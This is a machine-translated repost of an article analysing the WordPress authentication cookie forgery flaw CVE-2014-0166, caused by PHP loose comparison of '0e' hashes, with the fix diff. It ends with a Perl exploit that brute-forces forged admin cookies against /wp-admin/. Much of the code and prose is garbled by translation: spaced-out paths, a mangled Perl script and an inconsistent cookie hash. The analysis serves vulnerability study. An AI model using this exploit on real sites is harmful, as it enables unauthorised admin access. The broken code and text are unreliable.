WordPress cookie Forgery Vulnerability detailed analysis and exp

Source: Internet
Author: User
Tags hmac install wordpress

0 × 00 Preface
This article analyzes the cookie Forgery Vulnerability (CVE-2014-0166) fixed by wordpress3.8.2 and provides the corresponding exp.
According to the description, WordPress before 3.7.2 and 3.8.x before 3.8.2 are all affected,
Install wordpress 3.8.1 locally for testing.
0 × 01 vulnerability analysis knowledge preparation
Log on to the wordpress background and view the cookie
 

wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7Ca09bad0632c45f7295835bcc22f50ba7; wp-settings-time-1=1398577578



Where

 

wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28;

Other cookies for cookie authentication are optional,

Analyze the cookie Structure
Specifically, the cookie name wordpress_bbfa5bda-c6b7a9cf3cda9370be3ee91
Is wordpress_md5 (siteurl) siteurl as the wordpress path

C: \ AppServ \ www \ wordpress \ wp-shortdes \ default-constants.php (1 hit) Line 168: define ('cookiehash', md5 ($ siteurl)
3. My siteurl is http: // localhost/wordpress

After Md5, It is bbfa5bda-c6b7a9cf3cda9370be3ee91.

Check the cookie value again.


Admin | 1398748782 | 404207f08e7a5f32dcabad2969d6ee28;
 


Format: $ username | $ expiration | $ hmac

$ Username: User Name
$ Expiration indicates the cookie validity period.
$ Hamc indicates the hash value that the server assigns to the client after successful login.
The verification process is performed on the wp-nodes des/pluggable. php 543-nodes line.



$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);$hash = hash_hmac('md5', $username . '|' . $expiration, $key); if ( $hmac != $hash ) {do_action('auth_cookie_bad_hash', $cookie_elements);return false;}

$ Username, expiration obtained from cookie
Calculate $ key from $ username, $ pass_frag, $ expiration, $ scheme.
Calculate the hash using $ username, $ expiration, and $ key.
If it is consistent with $ hmac in the cookie, log on
To verify whether the above analysis is correct
We changed the above Code



$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);$hash = hash_hmac('md5', $username . '|' . $expiration, $key);echo '$username:'.$username."<br>";echo '$pass_frag:'.$pass_frag."<br>";echo '$expiration:'.$expiration."<br>";echo '$scheme:'.$scheme."<br>";echo '$key:'.$key."<br>";echo '$hash:'.$hash."<br>";echo '$hmac:'.$hmac."<br>";exit();if ( $hmac != $hash ) {do_action('auth_cookie_bad_hash', $cookie_elements);return false;}


That is, run to print out all the curious variables.
Output result:



$username:admin$pass_frag:XBxI$expiration:1398748782$scheme:auth$key:1002e6cddd0416ac265378aa4ab111f8$hash:404207f08e7a5f32dcabad2969d6ee28$hmac:404207f08e7a5f32dcabad2969d6ee28

Our analysis is correct!
0x02 vulnerability Principle
Compare the fix code of wordpress3.8.2



  $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);      $hash = hash_hmac('md5', $username . '|' . $expiration, $key); -  if ( $hmac != $hash ) { +  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {

Yes! = Changed! =
This is where the vulnerability is generated.

$ A ==$ B; // Equal TRUE if $ a is equal to $ B. $ a ===$ B; // Identical TRUE if $ a is equal to $ B, and they are of the same type php manual description above

= Non-strict comparison, type conversion and Comparison
= The two variables must be of the same type



<?phpvar_dump(0 == "a"); // 0 == 0 -> truevar_dump("1" == "01"); // 1 == 1 -> truevar_dump("10" == "1e1"); // 10 == 10 -> truevar_dump(100 == "1e2"); // 100 == 100 -> true?>

The preceding example is provided in the Manual.
1e2 is a scientific notation, and = is considered equal to 100 after type conversion.
Go back to wordpress
Wordpress_md5 (siteurl) = $ username | $ expiration | $ hmac


In this authentication cookie, if the value of $ username is fixed and $ hmac is fixed to 0, the value of $ expiration is constantly changed, so that
$ Hash = hash_hmac ('md5', $ username. '|'. $ expiration, $ key );


The value is constantly changing.
Once the value of $ hash changes to 0 represented by scientific notation, such as 0e + 30 digits 0-9, it can be verified.
The 32-bit scientific notation indicates 0, with a total of more:
10 ^ 0 + 10 ^ 1 + ...... 10 ^ 30 Cases
The total number of 32-bit md5 files is:
16 ^ 32 Cases
Therefore, the probability of attack success is:
(10 ^ 0 + 10 ^ 1 + ...... 10 ^ 30)/16 ^ 32
The probability of one thousandth of a million pieces of data is a perfect match.
0x03exp
Based on the above analysis, we can write exp.



Crak. pluse LWP: UserAgent; $ url = "http: // localhost/wordpress"; # the wordpress address to attack $ sitehash = "bbfa5b450c6b7a9cf3cda9370be3ee91 "; # $ url md5 value for ($ I = 10000000000; $ I ++) # $ expiration {my $ ua = LWP: UserAgent-> new; my $ req = HTTP: Request-> new ('get' => $ url. "/wp-admin/"); $ req-> header ('cookier' => "wordpress _". $ sitehash. "= admin % 7c ". $ I. "% 7c0;"); # Set the cookie to what we want my $ res = $ ua-> request ($ req); print "wordpress _". $ sitehash. "= admin % 7c ". $ I. "% 7c0 ". "\ n"; # print the cookie value to see print $ I. "\ t"; print $ url. "/wp-admin /". "\ n"; print $ res-> status_line. "\ n"; if (index ($ res-> content, "Hello, admin")> 0) records the result.html file {open (SH, "> d: /result.html "); print SH ($ I. "\ n ");}}

 


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.